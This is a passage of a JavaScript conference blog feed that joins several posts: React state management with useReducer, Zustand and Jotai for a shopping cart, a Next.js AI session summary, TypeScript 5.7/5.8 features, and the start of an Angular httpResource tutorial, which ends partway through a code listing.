The CartProvider component is the starting point for implementation. It holds the context and creates the state using the useReducer hook. It also uses the FETCH_CART action to ensure that the existing shopping cart is loaded from the server. The code has two parts: the reducer itself and a middleware. The reducer takes the form of the cartReducer function and is responsible for the local state. It consists of a switch statement and, in this simple example, supports the SET_CART action, which sets the shopping cart. What’s more interesting though is the cartMiddleware function. This is responsible for the asynchronous actions FETCH_CART and ADD_TO_CART. Unlike the reducer, the middleware cannot access the state directly, but must pass changes to the reducer via actions. To do this, it uses the dispatch function from the useReducer hook. The middleware can also have side effects such as asynchronous server communication. For example, the FETCH_CART action triggers a GET request to the server to retrieve the data from the current shopping cart. Once the data is available, it’s written to the local state using the SET_CART action.

If the middleware isn’t responsible for a received action, it passes it directly to the reducer so that you don’t need to distinguish between the two in the application and can simply use the middleware.

The useCart and useAddToCart functions are the interfaces between the application components and the reducer. Listing 5 shows how to use the reducer implementation in your components.

Listing 5: Integrating the reducer implementation

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useCart, useAddToCart } from './CartContext';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);
  const [cart] = useCart();
  const addToCart = useAddToCart();

  return (
    <li>
      {product.name}{' '}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cart.items.find((item) => item.id === product.id)?.quantity
        }
      />{' '}
      <button
        onClick={() =>
          addToCart({ ...product, quantity: Number(inputRef.current?.value) })
        }
      >
        add
      </button>
    </li>
  );
};

export default ListItem;

Read access to the state is still with the useCart function. The useAddToCart function creates a new function that you can pass a new updated item from the shopping cart to. This function generates the necessary action and dispatches it via the middleware.

Both the useState and useReducer approaches require a relatively large amount of boilerplate code around the business logic of the application's state management. This is why dedicated libraries exist, and Zustand is one of the most lightweight.

What Makes Zustand a Scalable State Management Solution?

The Zustand library takes care of an application's state. Its API is minimalistic, yet it has all the features you need to manage your application's state centrally. Stores are the central element; they are created with the create function, hold the state, and provide methods for modifying it. In your application's components, you interact with Zustand's stores using hook functions. The library lets you perform both synchronous and asynchronous actions and can persist the state to the browser's LocalStorage or IndexedDB via middleware. We don't need to go that far for the shopping cart implementation in our example. It's enough to load an existing shopping cart from the server and manage it with the list component. The state should also be accessible from other components, like CartOverview, which shows a summary of the shopping cart.

Before you can use Zustand, you have to install the library with your package manager. You can do this with npm using the command npm add zustand. The library comes with its own type definitions, so you don’t need to install any additional packages to use it in a TypeScript environment.

Create the CartStore outside the components of your application in a separate file. This manages items in the shopping cart. You can control access to the store with the useCartStore function, which gives access to the state and provides methods for adding products and loading the shopping cart from the server. Listing 6 shows the implementation details.

Listing 6: Access to the store

import { create } from 'zustand';
import { CartItem } from './types/Cart';

export type CartStore = {
  cartItems: CartItem[];
  addToCart: (item: CartItem) => Promise<void>;
  loadCart: () => Promise<void>;
};

export const useCartStore = create<CartStore>((set, get) => ({
  cartItems: [],

  addToCart: async (item: CartItem) => {
    set((state) => {
      const existingItemIndex = state.cartItems.findIndex(
        (cartItem) => cartItem.id === item.id
      );

      let updatedCart: CartItem[];
      if (existingItemIndex !== -1) {
        updatedCart = [...state.cartItems];
        updatedCart[existingItemIndex] = item;
      } else {
        updatedCart = [...state.cartItems, item];
      }

      return { cartItems: updatedCart };
    });

    await saveCartToServer(get().cartItems);
  },

  loadCart: async () => {
    const response = await fetch('http://localhost:3001/cart');
    const data: CartItem[] = (await response.json())['items'];
    set({ cartItems: data });
  },
}));

async function saveCartToServer(cartItems: CartItem[]): Promise<void> {
  await fetch('http://localhost:3001/cart', {
    method: 'PUT',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ items: cartItems }),
  });
}

Zustand's create function is implemented as a generic function. This means you can pass the state structure to it, and TypeScript helps where needed, whether in your development environment or your application's build process. Pass a callback function to create; inside it, you use the get function for read access and the set function for write access to the state. The set function behaves similarly to React's setState function: you can use the previous state to define a new structure and return it. The callback function that you pass to create returns an object structure. There, you define the state structure (in our case, cartItems) and methods for accessing it, like addToCart and loadCart. The addToCart method is implemented as an async method and manipulates the state with the set function. It also uses the helper function saveCartToServer to send the data to the server. After set is executed, the state already has the updated value, so you can read it with get. Always try to treat the state as a single source of truth.

The asynchronous loadCart method is used to initially fill the state with data from the server. You should execute this method once in a central location to make sure that the state is initialized correctly. Listing 7 shows an example using the application’s app component.

Listing 7: Integrating into the app component

import './App.css';
import List from './List';
import CartOverview from './CartOverview';
import { useCartStore } from './cartStore';
import { useEffect } from 'react';

function App() {
  const { loadCart } = useCartStore();

  useEffect(() => {
    loadCart();
  }, []);

  return (
    <>
      <CartOverview />
      <hr />
      <List />
    </>
  );
}

export default App;

Work with state happens in your application’s components, like the ListItem component. Here, you call the useCartStore function and use the cartItems structure to access the data in the store and add new products using the addToCart method. Listing 8 contains the corresponding code.

Listing 8: Integration into the ListItem component

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useCartStore } from './cartStore';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);
  const { cartItems, addToCart } = useCartStore();

  return (
    <li>
      {product.name}{' '}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cartItems.find((item) => item.id === product.id)?.quantity
        }
      />{' '}
      <button
        onClick={() =>
          addToCart({ ...product, quantity: Number(inputRef.current?.value) })
        }
      >
        add
      </button>
    </li>
  );
};

export default ListItem;

What's remarkable about Zustand is that you don't have to worry about integrating a provider. That's because Zustand doesn't rely on React's Context API to manage global state. One disadvantage is that the store is truly global, so you can't have two identical stores with different data states in your component hierarchy's subtrees. On the other hand, bypassing the Context API has some performance advantages that make Zustand an interesting alternative.
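The performance angle is easiest to see with selectors. Instead of destructuring the whole store as in Listing 8, a component can subscribe to just the slice it needs and then only re-renders when that slice changes. A minimal sketch (CartCount is a made-up component name):

import { useCartStore } from './cartStore';

const CartCount = () => {
  // Subscribe only to cartItems: updates to other store fields
  // won't re-render this component
  const cartItems = useCartStore((state) => state.cartItems);
  return <span>{cartItems.length}</span>;
};

export default CartCount;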

Why Choose Jotai for React State Management?

Similar to Zustand, Jotai is a lightweight library for state management in React. The library works with small, isolated units called atoms and uses React’s Hook API. Like Zustand, Jotai does not use React’s Context API by default. Individual central state elements and the interfaces to it are significantly smaller and clearly separated from each other. The atom function plays a central role, allowing you to define both the structure and the access functions. This definition takes place outside of the application’s components. Connection between the atoms and components is formed by the useAtom function, which enables you to interact with the central state.

You can install the Jotai library with the command npm add jotai. The difference between it and Zustand is that Jotai works with much finer structures. The atom is the central element here. In a simple instance, you pass the initial value to the atom function when you call it and can use it throughout your application. If you’re using TypeScript, you have the option of defining the type of the atom value as generic.
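For illustration, here is a minimal counter sketch of that simple case (countAtom and Counter are invented for this example; the shopping cart atoms follow in Listing 9):

import { atom, useAtom } from 'jotai';

// Initial value passed to atom(); with TypeScript you could
// also write atom<number>(0)
const countAtom = atom(0);

const Counter = () => {
  // Tuple access, analogous to React's useState
  const [count, setCount] = useAtom(countAtom);
  return <button onClick={() => setCount(count + 1)}>{count}</button>;
};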

Jotai provides three different hook functions for accessing the atom from a component. useAtom returns a tuple for read and write access. This tuple is similar in structure to the tuple returned by React’s useState hook. useAtomValue returns only the first part of the tuple, giving you read-only access to the atom. The counterpart is the useSetAtom function, which gives you the setter function for the atom. You can already achieve a lot with this structure, but Jotai also lets you combine atoms. To implement the shopping cart state, you create three atoms in total. One represents the shopping cart, one is for adding products, and one is for loading data from the server. Listing 9 shows the implementation details.

Listing 9: Implementing the atoms

import { atom } from 'jotai';
import { CartItem } from './types/Cart';

const cartItemsAtom = atom<CartItem[]>([]);

async function saveCartToServer(cartItems: CartItem[]): Promise<void> {
  await fetch('http://localhost:3001/cart', {
    method: 'PUT',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ items: cartItems }),
  });
}

const addToCartAtom = atom(null, async (get, set, item: CartItem) => {
  const currentCart = get(cartItemsAtom);
  const existingItemIndex = currentCart.findIndex(
    (cartItem) => cartItem.id === item.id
  );

  let updatedCart: CartItem[];
  if (existingItemIndex !== -1) {
    updatedCart = [...currentCart];
    updatedCart[existingItemIndex] = item;
  } else {
    updatedCart = [...currentCart, item];
  }

  set(cartItemsAtom, updatedCart);

  await saveCartToServer(updatedCart);
});

const loadCartAtom = atom(null, async (_get, set) => {
  const response = await fetch('http://localhost:3001/cart');
  const data: CartItem[] = (await response.json())['items'];
  set(cartItemsAtom, data);
});

export { cartItemsAtom, addToCartAtom, loadCartAtom };

You implement your application’s atoms separately from your components. For the cartItemsAtom, call the atom function with an empty array and define the type as a CartItem array. When implementing the business logic, also use the atom function, but pass the value null as the first argument and a function as the second. This creates a derived atom that only allows write access. In the function, you have access to the get and set functions. You can use these to access another atom – in this case, the cartItemsAtom. You can also support additional parameters that are passed when the function is called. For write access with set, pass a reference to the atom and then the updated value. Since the function can be asynchronous, you can easily integrate a side effect like loading data from the server or writing the updated shopping cart. The atoms are integrated into the application components using the Jotai hook functions. Listing 10 shows how this works in the ListItem component example.

Listing 10: Integration in the ListItem Component

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useAtom, useAtomValue, useSetAtom } from 'jotai';
import { cartItemsAtom, addToCartAtom } from './cart.atom';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);
  const cartItems = useAtomValue(cartItemsAtom);
  const addToCart = useSetAtom(addToCartAtom);

  return (
    <li>
      {product.name}{' '}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cartItems.find((item) => item.id === product.id)?.quantity
        }
      />{' '}
      <button
        onClick={() =>
          addToCart({ ...product, quantity: Number(inputRef.current?.value) })
        }
      >
        add
      </button>
    </li>
  );
};

export default ListItem;

For read access, you use the useAtomValue function directly; for the write-only derived atoms, useSetAtom is the right choice. To add a product to the shopping cart, simply call the addToCart function with the new shopping cart item. Jotai takes care of everything else, including updating all components affected by the atom change.
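The loadCartAtom from Listing 9 can be wired up the same way. The following sketch shows a hypothetical Cart component (its name, and the assumption that a CartItem carries name and quantity, are not from the original example) that triggers the initial load once and renders the items:

import { FC, useEffect } from 'react';
import { useAtomValue, useSetAtom } from 'jotai';
import { cartItemsAtom, loadCartAtom } from './cart.atom';

const Cart: FC = () => {
  const cartItems = useAtomValue(cartItemsAtom);
  const loadCart = useSetAtom(loadCartAtom);

  // Trigger the initial load from the server once on mount.
  useEffect(() => {
    loadCart();
  }, [loadCart]);

  return (
    <ul>
      {cartItems.map((item) => (
        <li key={item.id}>
          {item.name}: {item.quantity}
        </li>
      ))}
    </ul>
  );
};

export default Cart;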

Conclusion

In this article, you learned about different approaches to state management in a React application. We focused on lightweight approaches that don’t dictate your application’s entire architecture. The first approach used React’s very own interfaces – state or reducers and context. This gives you the maximum amount of freedom and flexibility in your implementation, but you also must take care of all the implementation details yourself.

If you’re willing to sacrifice some of this flexibility and accept an extra dependency in your application, libraries like Zustand or Jotai are a helpful alternative. The two libraries take different approaches: Zustand offers a compact solution that bundles both state and logic in a single store, while Jotai works with smaller units and lets you derive or combine them, making your application more flexible and individual parts easier to exchange. Ultimately, the solution you choose depends on the use case and your personal preferences.

🔍 Frequently Asked Questions (FAQ)

1. What are common reasons for implementing central state management in React?

Central state management is often necessary due to the component-based architecture of single-page applications. It enables efficient data sharing between deeply nested components without passing props through intermediate layers.

2. How does React’s Context API facilitate central state management?

The Context API allows React components to access shared state directly, bypassing the need to pass data through the component tree. This improves reusability and reduces coupling between components.

3. What are typical use cases for central state management in frontend applications?

Use cases include applications involving data record management such as e-commerce carts, address books, fleet management, and smart home systems. These scenarios require consistent, shared data access across multiple components.

4. How can you implement state management using only React without external libraries?

You can use a combination of useState and the Context API to manage and distribute state throughout the component tree. This lightweight method avoids additional dependencies but may require more boilerplate.

5. What are the advantages and limitations of Redux for state management?

Redux offers powerful state control and is suitable for large-scale applications, especially with tools like Redux Toolkit. However, it can introduce unnecessary overhead for smaller projects.

6. How does the useReducer hook enhance state logic separation?

The useReducer hook enables state manipulation through pure functions and action objects, improving code clarity and testability. It also allows the introduction of middleware for handling asynchronous actions.

7. What benefits does Zustand offer over React’s built-in state tools?

Zustand simplifies state logic by consolidating state and actions into centralized stores, avoiding the need for context providers. It supports asynchronous operations and optional local persistence via middleware.

8. How does Jotai manage state differently than Zustand?

Jotai uses atomic state units called atoms and provides fine-grained state control with minimal coupling. It emphasizes modularity and composability, which can lead to cleaner, more scalable code structures.

9. When should you choose Zustand or Jotai over native React state solutions?

Libraries like Zustand and Jotai are ideal when you want to reduce boilerplate, avoid prop drilling, and need a lightweight but scalable alternative to Redux. The choice depends on project complexity and team preferences.

The post What’s the Best Way to Manage State in React? appeared first on International JavaScript Conference.

Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman https://javascript-conference.com/blog/ai-nextjs-nir-kaufman-workshop/ Wed, 09 Jul 2025 16:26:32 +0000 https://javascript-conference.com/?p=108186 In today’s fast-evolving web development landscape, integrating AI into your apps isn't just a trend—it's becoming a necessity. In this hands-on session, Nir Kaufman walks developers through building AI-driven applications using the Next.js framework. Whether you're exploring generative AI, large language models (LLMs), or building smarter interfaces, this session provides the perfect foundation.

The post Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman appeared first on International JavaScript Conference.

The session dives deep into practical ways to incorporate AI into web applications using Next.js, covering everything from LLM fundamentals to real-world coding demos.

1. Understanding AI and Large Language Models (LLMs)

The session begins with an overview of how AI—especially generative AI models—can enhance modern web applications. Nir explains how LLMs understand and generate content based on user queries, opening the door to intelligent, context-aware features.

2. Integrating AI into Next.js

Participants learn how to connect their Next.js projects with AI APIs, fetching and utilizing model-generated data to enhance app functionality. This includes server-side and client-side integration techniques that ensure seamless performance.

3. Creating Intelligent, Adaptive Interfaces

One key highlight is building UIs that dynamically respond to user behavior. Nir demonstrates how to use AI-generated data to create content and interfaces that feel personalized and highly interactive.

4. Hands-On Coding Examples

Throughout the session, attendees follow along with real-world code samples. From generating UI components based on prompts to managing complex application state with AI logic, each example is designed for immediate application.

5. Best Practices for AI Integration

  • Performance: Use caching and smart data-fetching strategies to avoid bottlenecks.
  • Security: Keep API keys secure and handle user data responsibly.
  • Scalability: Design systems that can scale with increasing AI workloads.


Key Takeaways

  • AI enhances—rather than replaces—developer capabilities.
  • Dynamic user experiences are possible with personalized content generation.
  • Efficient state management is crucial in AI-enhanced UIs.
  • Security and privacy must be top priorities when dealing with user data and AI APIs.

Conclusion

This session equips developers with the tools and mindset to begin building powerful, AI-driven web applications using Next.js. Nir Kaufman’s practical approach bridges theory with real-world implementation, making it easier than ever to bring AI into your development stack.

If you’re ready to explore AI-powered features and elevate your web applications, this session is a must-watch. Watch the full session and start turning your ideas into intelligent applications today.


The post Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman appeared first on International JavaScript Conference.

What’s New in TypeScript 5.7/5.8 https://javascript-conference.com/blog/typescript-5-7-5-8-features-ecmascript-direct-execution/ Thu, 26 Jun 2025 12:29:50 +0000 https://javascript-conference.com/?p=108154 TypeScript is widely used today for developing modern web applications because it offers several advantages over a pure JavaScript approach. For example, TypeScript's static type system allows the written program code to be checked for errors during development and build time. This is also known as static code analysis and contributes to the long-term maintainability of the project. The two latest versions, TypeScript 5.7 from November 2024 and 5.8 from March 2025, bring several improvements and new features, which we will explore below.

The post What’s New in TypeScript 5.7/5.8 appeared first on International JavaScript Conference.

Improved Type Safety

TypeScript improves type safety in several areas. Variables that are never initialized are now detected more reliably. If a variable is declared but never assigned a value, the compiler reports an error. In certain situations, however, this cannot be determined unambiguously for TypeScript. Listing 1 shows such a situation: Within the function definition of “printResult()”, TypeScript cannot clearly determine which path is taken in the outer (separate) function. Therefore, TypeScript makes the “optimistic” assumption that the variable will be initialized.

Listing 1: Optimistic type check in different functional contexts

function foo() {
  let result: number
  if (myCondition()) {
    result = myCalculation();
  } else {
    const temporaryWork = myOtherCalculation();
    // Forgot to assign 'result'
  }
  printResult();
  function printResult() {
    console.log(result); // no compiler error
  }
}

With version 5.7, this situation has been improved, at least in cases where no conditions are used. In Listing 2, the variable “result” is not assigned, but this is also recognized within the function “printResult()” and now results in a compiler error.


Listing 2: Optimistic type check in different functional contexts

function foo() {
  let result: number
  // Further logic in which 'result' is never assigned

  printResult();
  function printResult() {
    console.log(result);
    // Variable 'result' is used before being assigned.(2454)
  }
}

Another type check ensures that methods with non-literal (computed) property names are consistently treated as index signatures in classes. Listing 3 shows this using a method declared with a computed symbol property name.

Listing 3: Index signatures for classes

declare const sym: symbol;
export class MyClass {
  [sym]() { return 1; }
}
// Is interpreted as
export class MyClass { [x: symbol]: () => number; }

Previously, this method was ignored by the type system. With 5.7, it now appears as an index signature ([x: symbol]). This harmonizes the behavior with object literals and can be particularly useful for generic APIs.

Last but not least, version 5.7 introduces a stricter error under the “noImplicitAny” compiler option. When this option is enabled, function definitions that do not declare an explicit return type are checked more thoroughly. These are often arrow functions used as callback handlers, for example in promise chains: “catch(() => null)”. If such handlers implicitly return “null” or “undefined,” the error “TS7011: Function expression, which lacks return-type annotation, implicitly has an ‘any’ return type” is now reported. Typing is therefore stricter here, helping to avoid runtime errors.

Latest ECMAScript and Node.js Support

With TypeScript 5.7, ECMAScript 2024 can now be used as the compile target (e.g., via the compiler flag --target es2024). This is particularly useful for staying up to date and gaining access to the latest language features and new APIs. These include “Object.groupBy()” and “Map.groupBy()”, which can be used to group an iterable or a map. Listing 4 shows this using an array called “inventory” containing various supermarket products. The array is divided into two groups: products that are still available (“sufficient”) and products that need to be restocked (“restock”). Object.groupBy() is passed the array to be grouped and a function that returns the group each item belongs to. The return value is an object (here the variable “result”) that contains the different groups as properties. Each group is again an array (see the console.log outputs in Listing 4). If a group does not contain any entries, the entire group is “undefined.”

Listing 4: Grouping arrays with Object.groupBy()

const inventory = [
 { name: "asparagus", type: "vegetables", quantity: 9 },
 { name: "bananas", type: "fruit", quantity: 5 },
 { name: "cherries", type: "fruit", quantity: 12 }
];

const result = Object.groupBy(inventory, ({ quantity }) =>
 quantity < 10 ? "restock" : "sufficient",
);

console.log(result.restock);
// [{ name: "asparagus", type: "vegetables", quantity: 9 },
//  { name: "bananas", type: "fruit", quantity: 5 }]

console.log(result.sufficient);
// [{ name: "cherries", type: "fruit", quantity: 12 }]
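The Map.groupBy() function mentioned above behaves analogously but returns a Map, which also permits non-string keys. A short sketch based on the same inventory array:

const byType = Map.groupBy(inventory, ({ type }) => type);

console.log(byType.get("fruit"));
// [{ name: "bananas", type: "fruit", quantity: 5 },
//  { name: "cherries", type: "fruit", quantity: 12 }]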

If more complex calculations are performed, or if WASM, multiple workers, and correspondingly complex setups are used, the TypedArray classes (e.g., “Uint8Array”), “ArrayBuffer,” and “SharedArrayBuffer” come into play. In ES2024, the length of an ArrayBuffer can be changed (“resize()”), while a SharedArrayBuffer can only grow (“grow()”), so the two buffer variants have slightly different APIs. The TypedArray classes, however, always use a buffer under the hood. To harmonize the newly created API differences, the common supertype “ArrayBufferLike” is used. If a specific implementation is to be used, the buffer type can now be specified explicitly, as all TypedArray classes are now generically typed with respect to the underlying buffer type. Listing 5 illustrates this: in the case of “Uint8Array,” “view” can always access the correct buffer variant “SharedArrayBuffer.”

Listing 5: TypedArrays with a generic buffer type

// New: TypedArray with a generic ArrayBuffer type
interface Uint8Array<T extends ArrayBufferLike = ArrayBufferLike> { /* ... */ }

// Usage with a concrete type:
// here, SharedArrayBuffer
const buffer = new SharedArrayBuffer(16, { maxByteLength: 1024 });
const view = new Uint8Array(buffer);

view.buffer.grow(512); // `grow` exists only on SharedArrayBuffer

Directly Executable TypeScript

In addition to the new features, TypeScript also supports libraries that execute TypeScript files directly without a compile step (e.g., “ts-node,” “tsx,” or Node 23.x with --experimental-strip-types). Direct execution can speed up development by skipping the build/compile step between writing and running code. This becomes possible when relative imports are adjusted: normally, imports do not have a file extension (see Listing 6), so they do not have to differ between the source code and the compiled result. Executing a file directly without translation, however, requires the “.ts” extension (Listing 6), and such an import usually results in a compiler error. With the new compiler option --rewriteRelativeImportExtensions, all TypeScript extensions (.ts, .tsx, .mts, .cts) are automatically rewritten to their JavaScript counterparts (.js, .jsx, .mjs, .cjs). On the one hand, this provides better support for direct execution; on the other hand, the same TypeScript files can still be used and compiled in the normal TypeScript build process. This is important, for example, for library authors who want to test their files quickly without a compile step but also need the real TypeScript build before publishing the library.


Listing 6: Import with .ts extension

import {Demo} from './bar'; // <- standard import
import {Demo} from './bar.ts'; // <- required for direct execution

If the Node.js option --experimental-strip-types is used to execute TypeScript directly, care must be taken to ensure that only TypeScript constructs that are easy for Node.js to remove (strip) are used. To better support this use case, the new compiler option --erasableSyntaxOnly has been added in 5.8. This option prohibits TypeScript-only features such as enums, namespaces, parameter properties (see also Listing 7), and special import forms, and marks them as compiler errors.

Listing 7: Constructs prohibited under “–erasableSyntaxOnly”

// error: namespace with runtime code
namespace container {
}

class Point {
  // error: implicit properties / parameter properties
  constructor(public x: number, public y: number) { }
}

// error: enum declaration
enum Direction {
  Up,
  Down
}
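If you still need comparable constructs under this option, erasable alternatives exist. A sketch of two common replacements (not from the release notes, just idiomatic TypeScript):

// A const object plus a derived type replaces the enum
const Direction = {
  Up: 'Up',
  Down: 'Down',
} as const;
type Direction = (typeof Direction)[keyof typeof Direction];

class Point {
  // Explicit property declarations replace parameter properties
  x: number;
  y: number;
  constructor(x: number, y: number) {
    this.x = x;
    this.y = y;
  }
}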

Further Improvements

The TypeScript team naturally wants to make the development process as pleasant as possible for all developers. To this end, it also uses all the new options available under the hood. Node.js 22, for example, introduced a caching API (“module.enableCompileCache()”), which TypeScript now uses to save recurring parsing and compilation costs. In benchmarks, compiling with tsc was about two to three times faster than before.

By default, the compiler checks whether special “@typescript/lib-*” packages are installed. These packages can be used to replace the standard TypeScript libraries in order to customize the behavior of what are actually native TypeScript APIs. Previously, the check for such library packages was always performed, even if no library packages were used, which can mean unnecessary overhead for many files or in large projects. With the new compiler option --libReplacement=false, this behavior can be disabled, which can improve initialization time, especially in very large projects and monorepos.

Support for developer tools is also an important task for TypeScript, so there have been updates to project and editor support as well. When an editor that uses the TS language server loads a file, it searches for the corresponding “tsconfig.json.” Previously, it stopped at the first match, which in monorepo-like structures often led the editor to assign the wrong configuration to a file and thus not offer correct developer support. With the new TypeScript versions, the directory tree is now searched further up if necessary to find a suitable configuration. In Listing 8, for example, the test file “foo-test.ts” is now correctly associated with the configuration “projekt/src/tsconfig.test.json” and not accidentally with the main configuration “projekt/tsconfig.json”. This makes it easier to work in workspaces or composite setups with multiple subprojects.


Listing 8: Repo structure with multiple TSConfigs

projekt/
├── src/
│   ├── tsconfig.json
│   ├── tsconfig.test.json
│   ├── foo.ts
│   └── foo-test.ts
└── tsconfig.json

Conclusion

TypeScript 5.7 and 5.8 offer a variety of direct and indirect improvements for developers. In particular, they increase type safety (better errors for uninitialized variables, stricter return checks) and bring the language up to date with ECMAScript. At the same time, they improve the developer experience through faster build processes (compile caching, optimized checks), extended Node.js support, and more flexible configuration for monorepos.

The TypeScript team is already working on many large and small improvements for the future. TypeScript 5.9 is in the starting blocks and is scheduled for release at the end of July. In addition, a major change is planned: the TypeScript compiler is to be completely rewritten in Go for version 7. Initial tests have shown that the new Go-based compiler can deliver up to 10 times faster builds for your own projects.

🔍 Frequently Asked Questions (FAQ)

1. What are the key improvements in TypeScript 5.7?
TypeScript 5.7 brings a host of enhancements, including better type safety, improved management of uninitialized variables, stricter enforcement of return types, and a more consistent approach to recognizing computed property names as index signatures.

2. How does TypeScript 5.8 support direct execution?
With TypeScript 5.8, you can now run .ts files directly using tools like ts-node or Node.js with the --experimental-strip-types flag. New compiler options like --rewriteRelativeImportExtensions and --erasableSyntaxOnly make this process even smoother.

3. What new JavaScript (ECMAScript 2024) features are supported?
TypeScript has added support for ECMAScript 2024 features, including Object.groupBy() and Map.groupBy(), which allow for powerful grouping operations on arrays and maps. It also introduces support for resizable and growable ArrayBuffer and SharedArrayBuffer types.

4. What does the --erasableSyntaxOnly compiler option do?
The --erasableSyntaxOnly option, introduced in TypeScript 5.8, prevents the use of TypeScript-specific constructs like enums, namespaces, and parameter properties in code meant for direct execution, ensuring it works seamlessly with Node.js’s stripping behavior.

5. How has type checking changed for computed method names?
In TypeScript 5.7, methods that use computed (non-literal) property names in classes are now treated as index signatures. This change aligns class behavior more closely with object literals, enhancing consistency for generic and dynamic APIs.

6. What are the benefits of compile caching in newer versions?
TypeScript now takes advantage of Node.js’s compile cache API, which cuts down on unnecessary parsing and compilation. This results in build times that can be 2 to 3 times faster, particularly in larger projects.

7. How does TypeScript handle multiple tsconfig files in monorepos?
In TypeScript 5.8, the compiler and language server have improved support for monorepos by continuing to search parent directories for the most suitable tsconfig.json. This enhancement boosts file association and IntelliSense accuracy in complex workspaces.

The post What’s New in TypeScript 5.7/5.8 appeared first on International JavaScript Conference.

]]>
Exploring httpResource in Angular 19.2 https://javascript-conference.com/blog/exploring-httpresource-angular-19/ Mon, 19 May 2025 11:30:20 +0000 https://javascript-conference.com/?p=107841 Angular 19.2 introduced the experimental httpResource feature, streamlining HTTP data loading within the reactive flow of applications. By leveraging signals, it simplifies asynchronous data fetching, providing developers with a more streamlined approach to handling HTTP requests. With Angular 20 on the horizon, this feature will evolve further, offering even more power for managing data in reactive applications. Let’s explore how to leverage httpResource to enhance your applications.

The post Exploring httpResource in Angular 19.2 appeared first on International JavaScript Conference.

As an example, we have a simple application that scrolls through levels in the style of the game Super Mario. Each level consists of tiles that are available in four different styles: overworld, underground, underwater, and castle. In our implementation, users can switch freely between these styles. Figure 1 shows the first level in overworld style, while Figure 2 shows the same level in underground style.

Figure 1: Level 1 in overworld style

Figure 2: Level 1 in the underground style

The LevelComponent in the example application uses an httpResource to load the level files (JSON) and the tiles for drawing the levels. To render and animate the levels, the example relies on a very simple engine that is included with the source code but treated as a black box in this article.

HttpClient under the hood enables the use of interceptors

At its core, the new httpResource currently uses the good old HttpClient. Therefore, the application has to provide this service, which is usually done by calling provideHttpClient during bootstrapping. As a consequence, the httpResource also automatically picks up the registered HttpInterceptors.
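A minimal bootstrapping sketch (AppComponent and authInterceptor are assumed to exist in the project):

import { bootstrapApplication } from '@angular/platform-browser';
import { provideHttpClient, withInterceptors } from '@angular/common/http';
import { AppComponent } from './app/app.component';
import { authInterceptor } from './app/auth.interceptor';

// httpResource delegates to the HttpClient, so providing it here also
// makes the registered interceptors apply to all resources.
bootstrapApplication(AppComponent, {
  providers: [provideHttpClient(withInterceptors([authInterceptor]))],
});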

However, the HttpClient is just an implementation detail that Angular may eventually replace with a different implementation.


Level files

In our example, the different levels are described by JSON files that define which tiles are to be displayed at which coordinates (Listing 1).

Listing 1:

{
  "levelId": 1,
  "backgroundColor": "#9494ff",
  "items": [
    { "tileKey": "floor", "col": 0, "row": 13, [...] },
    { "tileKey": "cloud", "col": 12, "row": 1, [...] },
    [...]
  ]
}

These coordinates define positions within a matrix of 16×16-pixel blocks. An overview.json file accompanies the level files and lists the names of the available levels.

LevelLoader takes care of loading these files. To do this, it uses the new httpResource (Listing 2).

Listing 2:

@Injectable({ providedIn: 'root' })
export class LevelLoader {
  getLevelOverviewResource(): HttpResourceRef<LevelOverview> {
    return httpResource<LevelOverview>('/levels/overview.json', {
      defaultValue: initLevelOverview,
    });
  }

  getLevelResource(levelKey: () => string | undefined): HttpResourceRef<Level> {
    return httpResource<Level>(() => !levelKey() ? undefined : `/levels/${levelKey()}.json`, {
      defaultValue: initLevel,
    });
  }

 [...]
}

The first parameter passed to httpResource represents the respective URL. The second optional parameter accepts an object with further options. This object allows the definition of a default value that is used before the resource has been loaded.

The getLevelResource method expects a signal with a levelKey, from which the service derives the name of the desired level file. This read-only signal is an abstraction of the type () => string | undefined.

The URL passed from getLevelResource to httpResource is a lambda expression that the resource automatically reevaluates when the levelKey signal changes. In the background, httpResource uses it to create a computed signal that acts as a trigger: every time this trigger changes, the resource loads the URL.

To prevent the httpResource from being triggered, this lambda expression must return the value undefined. This way, the loading can be delayed until the levelKey is available.

Further options with HttpResourceRequest

To get more control over the outgoing HTTP request, the caller can pass an HttpResourceRequest instead of a URL (Listing 3).

Listing 3:

getLevelResource(levelKey: () => string) {
  return httpResource<Level>(
    () => ({
      url: `/levels/${levelKey()}.json`,
      method: "GET",
      headers: {
        accept: "application/json",
      },
      params: {
        levelId: levelKey(),
      },
      reportProgress: false,
      body: null,
      transferCache: false,
      withCredentials: false,
    }),
    { defaultValue: initLevel }
  );
}

This HttpResourceRequest can also be represented by a lambda expression, from which the httpResource internally constructs a computed signal.

It is important to note that although the httpResource offers the option to specify HTTP methods (HTTP verbs) beyond GET and a body that is transferred as a payload, it is only intended for retrieving data. These options allow you to integrate web APIs that do not adhere to the semantics of HTTP verbs. By default, the httpResource converts the passed body to JSON.

With the reportProgress option, the caller can request information about the progress of the current operation. This is useful when downloading large files. I will discuss this in more detail below.

Analyzing and validating the received data

By default, the httpResource expects data in the form of JSON that matches the specified type parameter. In addition, a type assertion is used to ensure that TypeScript assumes the presence of correct types. However, it is possible to intervene in this process to provide custom logic for validating the received raw value and converting it to the desired type. To do this, the caller defines a function using the map property in the options object (Listing 4).

Listing 4:

getLevelResourceAlternative(levelKey: () => string) {
  return httpResource<Level>(() => `/levels/${levelKey()}.json`, {
    defaultValue: initLevel,
    map: (raw) => {
      return toLevel(raw);
    },
  });
}

The httpResource converts the received JSON into an object of type unknown and passes it to map. In our example, a simple self-written function toLevel is used. In addition, map also allows the integration of libraries such as Zod, which performs schema validation.
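A schema-based variant with Zod might look like the following sketch; the LevelSchema shown here is an assumption that only models the fields from Listing 1:

import { z } from 'zod';

const LevelSchema = z.object({
  levelId: z.number(),
  backgroundColor: z.string(),
  items: z.array(
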